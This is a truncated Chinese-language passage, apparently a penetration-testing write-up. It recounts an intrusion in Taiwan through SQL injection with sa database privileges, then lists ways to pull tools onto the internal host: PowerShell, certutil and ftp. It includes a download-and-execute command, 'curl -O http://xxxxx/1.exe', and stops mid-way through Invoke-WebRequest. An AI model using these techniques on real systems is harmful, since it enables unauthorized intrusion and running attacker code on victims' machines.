场景:
在过去我在做某次台湾渗透的过程中遇到了一个sql注入,数据库权限是sa权限,主机在内网无法直接登录,我们需要上传nc或者其他的转发程序将其转发出来,即便不行,我们也需要上传一个shell,但是基于没有后台的情况下,我们只能将希望寄托于sa。
应用:
Powershell
certutil
ftp
Powershell
在windows版本中powershell支持部分linux命令。如curl,所以可以在系统支持powershell的情况下我们可以使用:
curl -O http://xxxxx/1.exe来进行下载执行。当然还有其他的方式,powershell自带的不止curl一种,我们还可以使用:
Invoke-WebRequ
